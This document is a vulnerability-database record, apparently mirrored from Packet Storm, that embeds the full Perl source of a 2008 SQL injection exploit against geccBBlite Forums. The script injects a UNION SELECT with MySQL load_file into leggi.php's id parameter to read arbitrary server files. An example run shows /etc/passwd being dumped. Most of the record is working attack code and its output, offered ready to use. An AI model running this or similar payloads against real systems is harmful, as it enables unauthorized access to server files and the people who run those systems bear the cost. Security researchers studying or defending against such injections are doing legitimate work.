DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:70671", "type": "packetstorm", "bulletinFamily": "exploit", "title": "geccbblite-sql.txt", "description": "", "published": "2008-10-07T00:00:00", "modified": "2008-10-07T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/70671/geccbblite-sql.txt.html", "reporter": "Piker", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:27:15", "viewCount": 8, "enchantments": {"score": {"value": -0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/70671/geccbblite-sql.txt", "sourceData": "`#!/usr/bin/perl \n################################ \n## Coded by Piker [piker(dot)ther00t(at)gmail(dot)com] \n## D.O.M Team \n## piker,ka0x,an0de,xarnuz \n## 2008 Security Researchers \n################################ \n## \n## geccBBlite Forums SQL Injection Exploit \n## \n## This exploit tries to read an \n## arbitrary file. \n## \n################################ \n \n# piker@domlabs:~/advisories$ perl geccBB.pl http://localhost/geccBB /etc/passwd \n#[+] Prefix: geccBB_ \n#[+] File HEX: 0x2f6574632f706173737764 \n#[+] Host: http://localhost/geccBB/ \n#[+] File content: \n#daemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/#bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/#shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/#bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/#gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shdhcp:x:100:101::/nonexistent:/bin/falsesyslog:x:101:102::/home/syslog:/bin/#falseklog:x:102:103::/home/klog:/bin/falsemessagebus:x:103:109::/var/run/dbus:/bin/falsehplip:x:104:7:HPLIP system user,,,:/var/run/hplip:/bin/falseavahi-#autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/falseavahi:x:106:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/#falsehaldaemon:x:107:116:Hardware abstraction layer,,,:/home/haldaemon:/bin/falsegdm:x:108:118:Gnome Display Manager:/var/lib/gdm:/bin/#falsepiker:x:1000:1000:piker,,,,:/home/piker:/bin/bashlibuuid:x:109:120::/var/lib/libuuid:/bin/shpulse:x:110:121:PulseAudio daemon,,,:/var/run/pulse:/bin/#falsepolkituser:x:111:125:PolicyKit,,,:/var/run/PolicyKit:/bin/falsemysql:x:112:127:MySQL Server,,,:/var/lib/mysql:/bin/falseuml-net:x:113:129::/home/uml-#net:/bin/falsesshd:x:114:65534::/var/run/sshd:/usr/sbin/#nologinpostfix:x:115:130::/var/spool/postfix:/bin/false \n#[+] EOF \n# \n# \n \n \nuse LWP::UserAgent; \n \nopen(FILE, \">&STDOUT\"); \n \nmy $host = $ARGV[0]; \nmy $file = $ARGV[1]; \nmy $prefix = \"geccBB_\"; \nif (length($ARGV[2]) > 0){ $prefix = $ARGV[2]; } \n \ndie &_USO unless $ARGV[1]; \n \nsub _USO \n{ \ndie \" \ngeccBBlite Forums SQL Injection Exploit \n \nThis exploit tries to read an \narbitrary file. \n \nusage: ./$0 <host> <file_you_want> [prefix: default geccBB_] \nex: ./$0 http://localhost/geccBB/ /etc/passwd \n \n\"; \n} \n \nmy $ua = LWP::UserAgent->new() or die; \n$ua->agent(\"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1\"); \n \nmy $tmp=\"0x\"; \nmy $tmp2; \n \nprint FILE \"[+] Prefix: \".$prefix.\"\\n\"; \n \nforeach my $c (split(//, $file)){ \n$tmp2 = sprintf (\"%x\", ord($c)); \n$tmp .= $tmp2; \n} \n \nprint FILE \"[+] File HEX: \".$tmp.\"\\n\"; \n \nif ($host !~ /\\/$/){ $host .= \"/\"; } \n \nprint FILE \"[+] Host: \".$host.\"\\n\"; \n \nmy $req = HTTP::Request->new(GET => $host.\"leggi.php?id=-1 union all select 1,2,3,CONCAT(0x3c46494c453e,load_file(\".$tmp.\"),0x3c46494c453e),5,6 from \".$prefix.\"forum\"); \nmy $res = $ua->request($req); \nmy $con = $res->content; \n \nmy $ok = 0; \n \nif ($res->is_success){ \nforeach my $linea (split(/\\n/, $con)){ \nif($ok == 1){ \nif ($linea !~ /<FILE>/){ \nprint FILE $linea; \n}else{ \nprint FILE \"\\n[+] EOF\\n\"; \ngoto salida; \n} \n} \nif($linea =~ /<FILE>/i && $ok == 0){ \n$ok = 1; \nprint FILE \"[+] File content: \\n\"; \n} \n} \nsalida: \nif ($ok == 0){ \nprint FILE \"[-] Exploit Failed!\"; \n} \n} \nelse{ \nprint FILE \"[-] Exploit Failed!\"; \n} \n \n#EOF \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645416584}}

{}